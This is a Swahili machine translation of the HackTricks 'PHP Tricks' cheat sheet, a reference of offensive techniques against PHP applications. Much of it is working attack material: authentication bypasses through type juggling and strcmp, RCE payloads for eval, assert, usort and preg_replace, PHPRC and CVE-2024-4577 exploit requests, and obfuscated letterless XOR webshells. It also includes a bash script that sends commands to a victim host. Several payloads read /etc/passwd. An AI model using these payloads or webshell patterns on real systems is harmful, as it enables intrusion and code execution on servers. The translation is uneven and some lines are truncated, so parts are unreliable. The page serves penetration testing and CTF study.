PHP Tricks

Support HackTricks

Mahali pa kawaida pa Cookies:

Hii pia inatumika kwa cookies za phpMyAdmin.

Cookies:

PHPSESSID
phpMyAdmin

Mahali:

/var/lib/php/sessions
/var/lib/php5/
/tmp/
Example: ../../../../../../tmp/sess_d1d531db62523df80e1153ada1d4b02e

Kupita Mifano ya PHP

Mifano ya Kijinga/Kuchanganya Aina ( == )

Ikiwa == inatumika katika PHP, basi kuna kesi zisizotarajiwa ambapo mifano haiwezi kutenda kama inavyotarajiwa. Hii ni kwa sababu "==" inalinganisha tu thamani zilizobadilishwa kuwa aina sawa, ikiwa unataka pia kulinganisha kwamba aina ya data inayolinganishwa ni sawa unahitaji kutumia ===.

Meza za kulinganisha za PHP: https://www.php.net/manual/en/types.comparisons.php

  • "string" == 0 -> True Mfuatano ambao hauanzishi na nambari ni sawa na nambari

  • "0xAAAA" == "43690" -> True Mfuatano unaoundwa na nambari katika muundo wa dec au hex unaweza kulinganishwa na nambari/mfuatano mwingine na True kama matokeo ikiwa nambari zilikuwa sawa (nambari katika mfuatano zinatafsiriwa kama nambari)

  • "0e3264578" == 0 --> True Mfuatano unaoanzishwa na "0e" na kufuatwa na chochote kitakuwa sawa na 0

  • "0X3264578" == 0X --> True Mfuatano unaoanzishwa na "0" na kufuatwa na herufi yoyote (X inaweza kuwa herufi yoyote) na kufuatwa na chochote kitakuwa sawa na 0

  • "0e12334" == "0" --> True Hii ni ya kuvutia sana kwa sababu katika baadhi ya kesi unaweza kudhibiti ingizo la mfuatano wa "0" na maudhui fulani yanayohesabiwa na kulinganishwa nayo. Hivyo, ikiwa unaweza kutoa thamani itakayounda hash inayooanza na "0e" na bila herufi yoyote, unaweza kupita kulinganisha. Unaweza kupata mfuatano ambao tayari umehesabiwa kwa muundo huu hapa: https://github.com/spaze/hashes

  • "X" == 0 --> True Herufi yoyote katika mfuatano ni sawa na int 0

Maelezo zaidi katika https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09

in_array()

Kuchanganya Aina pia kunaathiri kazi ya in_array() kwa default (unahitaji kuweka argument ya tatu kuwa kweli ili kufanya kulinganisha kwa ukali):

$values = array("apple","orange","pear","grape");
var_dump(in_array(0, $values));
//True
var_dump(in_array(0, $values, true));
//False

strcmp()/strcasecmp()

Ikiwa kazi hii inatumika kwa ukaguzi wowote wa uthibitishaji (kama vile kuangalia nenosiri) na mtumiaji anadhibiti upande mmoja wa kulinganisha, anaweza kutuma array tupu badala ya string kama thamani ya nenosiri (https://example.com/login.php/?username=admin&password[]=) na kupita ukaguzi huu:

if (!strcmp("real_pwd","real_pwd")) { echo "Real Password"; } else { echo "No Real Password"; }
// Real Password
if (!strcmp(array(),"real_pwd")) { echo "Real Password"; } else { echo "No Real Password"; }
// Real Password

The same error occurs with strcasecmp()

Strict type Juggling

Hata kama === inatumika kunaweza kuwa na makosa yanayofanya kulinganisha kuwa hatarini kwa type juggling. Kwa mfano, ikiwa kulinganisha kuna kubadilisha data kuwa aina tofauti ya kitu kabla ya kulinganisha:

(int) "1abc" === (int) "1xyz" //This will be true

preg_match(/^.*/)

preg_match() inaweza kutumika kuhakiki ingizo la mtumiaji (ina angalia kama neno/regex lolote kutoka kwenye blacklist lipo kwenye ingizo la mtumiaji na kama halipo, msimbo unaweza kuendelea na utekelezaji wake).

Njia ya kupita mistari mipya

Hata hivyo, wakati wa kuweka mipaka ya mwanzo wa regexp preg_match() inaangalia tu mstari wa kwanza wa ingizo la mtumiaji, kisha ikiwa kwa namna fulani unaweza kutuma ingizo katika mistari kadhaa, unaweza kuwa na uwezo wa kupita ukaguzi huu. Mfano:

$myinput="aaaaaaa
11111111"; //Notice the new line
echo preg_match("/1/",$myinput);
//1  --> In this scenario preg_match find the char "1"
echo preg_match("/1.*$/",$myinput);
//1  --> In this scenario preg_match find the char "1"
echo preg_match("/^.*1/",$myinput);
//0  --> In this scenario preg_match DOESN'T find the char "1"
echo preg_match("/^.*1.*$/",$myinput);
//0  --> In this scenario preg_match DOESN'T find the char "1"

Ili kupita kipimo hiki unaweza kutuma thamani yenye mistari mipya iliyopangwa (%0A) au ikiwa unaweza kutuma data za JSON, zitume katika mistari kadhaa:

{
"cmd": "cat /etc/passwd"
}

Find an example here: https://ramadistra.dev/fbctf-2019-rceservice

Length error bypass

(Hii bypass ilijaribiwa waziwazi kwenye PHP 5.2.5 na sikuweza kuifanya ifanye kazi kwenye PHP 7.3.15) Ikiwa unaweza kutuma kwa preg_match() ingizo halali kubwa sana, haitaweza kulipitia na utaweza kuepuka ukaguzi. Kwa mfano, ikiwa inakataa JSON unaweza kutuma:

payload = '{"cmd": "ls -la", "injected": "'+ "a"*1000001 + '"}'

From: https://medium.com/bugbountywriteup/solving-each-and-every-fb-ctf-challenge-part-1-4bce03e2ecb0

ReDoS Bypass

Trick from: https://simones-organization-4.gitbook.io/hackbook-of-a-hacker/ctf-writeups/intigriti-challenges/1223 and https://mizu.re/post/pong

Kwa kifupi, tatizo linatokea kwa sababu ya preg_* functions katika PHP inategemea PCRE library. Katika PCRE, baadhi ya regular expressions zinapatikana kwa kutumia wito mwingi wa recursive, ambayo inatumia nafasi kubwa ya stack. Inawezekana kuweka kikomo juu ya idadi ya recursions zinazoruhusiwa, lakini katika PHP kikomo hiki kimewekwa kuwa 100.000 ambacho ni zaidi ya kinachoweza kutoshea kwenye stack.

Thread hii ya Stackoverflow pia ilihusishwa katika chapisho ambapo inazungumziwa kwa undani zaidi kuhusu tatizo hili. Kazi yetu sasa ilikuwa wazi: Tuma input ambayo itafanya regex ifanye 100_000+ recursions, ikisababisha SIGSEGV, na kufanya preg_match() function irudishe false hivyo kufanya programu ifikirie kwamba input yetu si mbaya, ikitupa mshangao mwishoni mwa payload kama {system(<verybadcommand>)} ili kupata SSTI --> RCE --> flag :).

Vizuri, katika maneno ya regex, hatufanyi kweli 100k "recursions", bali tunahesabu "backtracking steps", ambayo kama nyaraka za PHP inavyosema inarudiwa kuwa 1_000_000 (1M) katika variable pcre.backtrack_limit.\ Ili kufikia hiyo, 'X'*500_001 itasababisha hatua milioni moja za backtracking (500k mbele na 500k nyuma):

payload = f"@dimariasimone on{'X'*500_001} {{system('id')}}"

Aina ya Kucheza kwa obfuscation ya PHP

$obfs = "1"; //string "1"
$obfs++; //int 2
$obfs += 0.2; //float 2.2
$obfs = 1 + "7 IGNORE"; //int 8
$obfs = "string" + array("1.1 striiing")[0]; //float 1.1
$obfs = 3+2 * (TRUE + TRUE); //int 7
$obfs .= ""; //string "7"
$obfs += ""; //int 7

Execute After Redirect (EAR)

Ikiwa PHP inarejelea kwenye ukurasa mwingine lakini hakuna die au exit kazi inayopigwa baada ya kichwa Location kuwekwa, PHP inaendelea kutekeleza na kuongezea data kwenye mwili:

<?php
// In this page the page will be read and the content appended to the body of
// the redirect response
$page = $_GET['page'];
header('Location: /index.php?page=default.html');
readfile($page);
?>

Path Traversal and File Inclusion Exploitation

Check:

File Inclusion/Path traversal

More tricks

  • register_globals: Katika PHP < 4.1.1.1 au ikiwa imewekwa vibaya, register_globals inaweza kuwa hai (au tabia zao zinaweza kuigwa). Hii ina maana kwamba katika mabadiliko ya kimataifa kama $_GET ikiwa yana thamani e.g. $_GET["param"]="1234", unaweza kuyafikia kupitia $param. Kwa hivyo, kwa kutuma vigezo vya HTTP unaweza kubadilisha mabadiliko yanayotumika ndani ya msimbo.

  • Cookies za PHPSESSION za eneo moja zinahifadhiwa mahali pamoja, kwa hivyo ikiwa ndani ya eneo cookies tofauti zinatumika katika njia tofauti unaweza kufanya njia hiyo ifikie cookie ya njia kwa kuweka thamani ya cookie ya njia nyingine. Kwa njia hii ikiwa njia zote mbili zinapata mabadiliko yenye jina sawa unaweza kufanya thamani ya mabadiliko hayo katika path1 itumike kwa path2. Na kisha path2 itachukulia kama halali mabadiliko ya path1 (kwa kutoa cookie jina linalolingana nayo katika path2).

  • Unapokuwa na majina ya watumiaji wa mashine. Angalia anwani: /~<USERNAME> ili kuona ikiwa saraka za php zimewezeshwa.

password_hash/password_verify

Hizi kazi hutumiwa kawaida katika PHP ili kuunda hash kutoka kwa nywila na kuangalia ikiwa nywila ni sahihi ikilinganishwa na hash. Mifumo inayoungwa mkono ni: PASSWORD_DEFAULT na PASSWORD_BCRYPT (inaanza na $2y$). Kumbuka kwamba PASSWORD_DEFAULT mara nyingi ni sawa na PASSWORD_BCRYPT. Na kwa sasa, PASSWORD_BCRYPT ina kikomo cha ukubwa katika ingizo cha 72bytes. Kwa hivyo, unapojaribu kuunda hash ya kitu kikubwa zaidi ya 72bytes kwa kutumia algorithimu hii, ni zile 72B za kwanza pekee zitakazotumika:

$cont=71; echo password_verify(str_repeat("a",$cont), password_hash(str_repeat("a",$cont)."b", PASSW
False

$cont=72; echo password_verify(str_repeat("a",$cont), password_hash(str_repeat("a",$cont)."b", PASSW
True

HTTP headers bypass abusing PHP errors

Causing error after setting headers

Kutoka hii thread ya twitter unaweza kuona kwamba kutuma zaidi ya 1000 GET params au 1000 POST params au faili 20, PHP haitakuwa ikipanga vichwa katika jibu.

Inaruhusu kupita kwa mfano vichwa vya CSP vinavyopangwa katika misimbo kama:

<?php
header("Content-Security-Policy: default-src 'none';");
if (isset($_GET["xss"])) echo $_GET["xss"];

Kujaza mwili kabla ya kuweka vichwa

Ikiwa ukurasa wa PHP unachapisha makosa na kurudisha baadhi ya maelezo yaliyotolewa na mtumiaji, mtumiaji anaweza kufanya seva ya PHP irudishe maudhui marefu kiasi kwamba inapojaribu kuongeza vichwa kwenye jibu, seva itatupa makosa. Katika hali ifuatayo, mshambuliaji alifanya seva itupe makosa makubwa, na kama unavyoona kwenye skrini wakati php ilijaribu kubadilisha taarifa za kichwa, haikuweza (kwa hivyo kwa mfano kichwa cha CSP hakikutumwa kwa mtumiaji):

SSRF katika kazi za PHP

Angalia ukurasa:

PHP SSRF

Utekelezaji wa msimbo

system("ls"); `ls`; shell_exec("ls");

Angalia hii kwa kazi za PHP zenye manufaa zaidi

RCE kupitia preg_replace()

preg_replace(pattern,replace,base)
preg_replace("/a/e","phpinfo()","whatever")

Ili kutekeleza msimbo katika hoja ya "replace" inahitajika angalau mechi moja. Chaguo hili la preg_replace limekuwa lililopitwa na wakati tangu PHP 5.5.0.

RCE kupitia Eval()

'.system('uname -a'); $dummy='
'.system('uname -a');#
'.system('uname -a');//
'.phpinfo().'
<?php phpinfo(); ?>

RCE kupitia Assert()

Kazi hii ndani ya php inakuwezesha kutekeleza msimbo ulioandikwa katika mfuatano ili kurudisha kweli au uongo (na kulingana na hii kubadilisha utekelezaji). Kawaida, kigezo cha mtumiaji kitaingizwa katikati ya mfuatano. Kwa mfano: assert("strpos($_GET['page']),'..') === false") --> Katika kesi hii ili kupata RCE unaweza kufanya:

?page=a','NeVeR') === false and system('ls') and strpos('a

You will need to break the code syntax, add your payload, and then fix it again. You can use logic operations such as "and" or "%26%26" or "|". Note that "or", "||" doesn't work because if the first condition is true our payload won't get executed. The same way ";" doesn't work as our payload won't be executed.

Other option is to add to the string the execution of the command: '.highlight_file('.passwd').'

Other option (if you have the internal code) is to modify some variable to alter the execution: $file = "hola"

RCE kupitia usort()

This function is used to sort an array of items using an specific function. To abuse this function:

<?php usort(VALUE, "cmp"); #Being cmp a valid function ?>
VALUE: );phpinfo();#

<?php usort();phpinfo();#, "cmp"); #Being cmp a valid function ?>
<?php
function foo($x,$y){
usort(VALUE, "cmp");
}?>
VALUE: );}[PHP CODE];#

<?php
function foo($x,$y){
usort();}phpinfo;#, "cmp");
}?>

You can also use // to comment the rest of the code.

To discover the number of parenthesis that you need to close:

  • ?order=id;}//: tunapata ujumbe wa kosa (Parse error: syntax error, unexpected ';'). Huenda tunakosa moja au zaidi ya mabano.

  • ?order=id);}//: tunapata onyo. Hii inaonekana kuwa sawa.

  • ?order=id));}//: tunapata ujumbe wa kosa (Parse error: syntax error, unexpected ')' i). Huenda tuna mabano ya kufunga mengi kupita kiasi.

RCE kupitia .httaccess

If you can upload a .htaccess, then you can configure several things and even execute code (configuring that files with extension .htaccess can be executed).

Different .htaccess shells can be found here

RCE kupitia Env Variables

If you find a vulnerability that allows you to modify env variables in PHP (and another one to upload files, although with more research maybe this can be bypassed), you could abuse this behaviour to get RCE.

  • LD_PRELOAD: Hii env variable inaruhusu kupakia maktaba za kawaida unapoendesha binaries nyingine (ingawa katika kesi hii huenda isifanye kazi).

  • PHPRC : Inatoa maagizo kwa PHP kuhusu mahali pa kupata faili yake ya usanidi, ambayo kawaida inaitwa php.ini. Ikiwa unaweza kupakia faili yako ya usanidi, basi, tumia PHPRC kuonyesha PHP kwenye hiyo. Ongeza auto_prepend_file kuingiza faili la pili ulilopakia. Faili hii ya pili ina PHP code ya kawaida, ambayo kisha inatekelezwa na PHP runtime kabla ya msimbo mwingine wowote.

  1. Pakia faili la PHP linalo zawisha shellcode yetu

  2. Pakia faili la pili, linalo na auto_prepend_file maagizo yanayoelekeza preprocessor ya PHP kutekeleza faili tulilopakia katika hatua ya 1

  3. Weka variable PHPRC kwenye faili tulilopakia katika hatua ya 2.

  • Pata maelezo zaidi kuhusu jinsi ya kutekeleza mnyororo huu kutoka kwa ripoti ya asili.

  • PHPRC - chaguo lingine

  • Ikiwa huwezi kupakia faili, unaweza kutumia katika FreeBSD "faili" /dev/fd/0 ambayo ina stdin, ikiwa ni mwili wa ombi lililotumwa kwa stdin:

  • curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'

  • Au kupata RCE, wezesha allow_url_include na uongeze faili yenye base64 PHP code:

  • curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'

XAMPP CGI RCE - CVE-2024-4577

The webserver parses HTTP requests and passes them to a PHP script executing a request such as as http://host/cgi.php?foo=bar as php.exe cgi.php foo=bar, which allows a parameter injection. This would allow to inject the following parameters to load the PHP code from the body:

-d allow_url_include=1 -d auto_prepend_file=php://input

Zaidi ya hayo, inawezekana kuingiza param "- " kwa kutumia herufi 0xAD kutokana na urekebishaji wa PHP baadaye. Angalia mfano wa exploit kutoka hiki chapisho:

POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
User-Agent: curl/8.3.0
Accept: */*
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php
phpinfo();
?>

PHP Sanitization bypass & Brain Fuck

Katika chapisho hili inawezekana kupata mawazo mazuri ya kuunda msimbo wa PHP wa brain fuck ukiwa na herufi chache tu zinazoruhusiwa. Zaidi ya hayo, pia inashauriwa njia ya kuvutia ya kutekeleza kazi ambazo ziliruhusu kupita ukaguzi kadhaa:

(1)->{system($_GET[chr(97)])}

PHP Static analysis

Angalia kama unaweza kuingiza msimbo katika wito wa hizi kazi (kutoka hapa):

exec, shell_exec, system, passthru, eval, popen
unserialize, include, file_put_cotents
$_COOKIE | if #This mea

Ikiwa unarekebisha programu ya PHP unaweza kuweka wazi uchapishaji wa makosa kwa kuongeza display_errors = On katika /etc/php5/apache2/php.ini na kuanzisha upya apache: sudo systemctl restart apache2

Kuondoa ufichaji wa PHP

Unaweza kutumia web www.unphp.net kuondoa ufichaji wa msimbo wa php.

PHP Wrappers & Protocols

PHP Wrappers na protokali zinaweza kukuruhusu kupita ulinzi wa kuandika na kusoma katika mfumo na kuathiri. Kwa maelezo zaidi angalia ukurasa huu.

Xdebug RCE isiyo na uthibitisho

Ikiwa unaona kwamba Xdebug ime wezeshwa katika matokeo ya phpconfig() unapaswa kujaribu kupata RCE kupitia https://github.com/nqxcode/xdebug-exploit

Variable variables

$x = 'Da';
$$x = 'Drums';

echo $x; //Da
echo $$x; //Drums
echo $Da; //Drums
echo "${Da}"; //Drums
echo "$x ${$x}"; //Da Drums
echo "$x ${Da}"; //Da Drums

RCE abusing new $_GET["a"]($_GET["b")

Ikiwa katika ukurasa unaweza kuunda kitu kipya cha darasa lolote unaweza kuwa na uwezo wa kupata RCE, angalia ukurasa ufuatao kujifunza jinsi:

PHP - RCE abusing object creation: new $_GET["a"]($_GET["b"])

Execute PHP without letters

https://securityonline.info/bypass-waf-php-webshell-without-numbers-letters/

Using octal

$_="\163\171\163\164\145\155(\143\141\164\40\56\160\141\163\163\167\144)"; #system(cat .passwd);

XOR

$_=("%28"^"[").("%33"^"[").("%34"^"[").("%2c"^"[").("%04"^"[").("%28"^"[").("%34"^"[").("%2e"^"[").("%29"^"[").("%38"^"[").("%3e"^"["); #show_source
$__=("%0f"^"!").("%2f"^"_").("%3e"^"_").("%2c"^"_").("%2c"^"_").("%28"^"_").("%3b"^"_"); #.passwd
$___=$__; #Could be not needed inside eval
$_($___); #If ¢___ not needed then $_($__), show_source(.passwd)

XOR rahisi shell code

Kulingana na hii andiko ifuatayo inawezekana kuzalisha shellcode rahisi kwa njia hii:

$_="`{{{"^"?<>/"; // $_ = '_GET';
${$_}[_](${$_}[__]); // $_GET[_]($_GET[__]);

$_="`{{{"^"?<>/";${$_}[_](${$_}[__]); // $_ = '_GET'; $_GET[_]($_GET[__]);

Hivyo, ikiwa unaweza kutekeleza PHP isiyo na nambari na herufi unaweza kutuma ombi kama ifuatavyo ukitumia hiyo payload kutekeleza PHP isiyo na mipaka:

POST: /action.php?_=system&__=cat+flag.php
Content-Type: application/x-www-form-urlencoded

comando=$_="`{{{"^"?<>/";${$_}[_](${$_}[__]);

Kwa maelezo ya kina zaidi angalia https://ctf-wiki.org/web/php/php/#preg_match

XOR Shellcode (ndani ya eval)

#!/bin/bash

if [[ -z $1 ]]; then
echo "USAGE: $0 CMD"
exit
fi

CMD=$1
CODE="\$_='\
lt;>/'^'{{{{';\${\$_}[_](\${\$_}[__]);" `$_='
lt;>/'^'{{{{'; --> _GET` `${$_}[_](${$_}[__]); --> $_GET[_]($_GET[__])` `So, the function is inside $_GET[_] and the parameter is inside $_GET[__]` http --form POST "http://victim.com/index.php?_=system&__=$CMD" "input=$CODE"

Kama Perl

<?php
$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;

$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;

$_=$$____;
$___($_[_]); // ASSERT($_POST[_]);
Support HackTricks

Last updated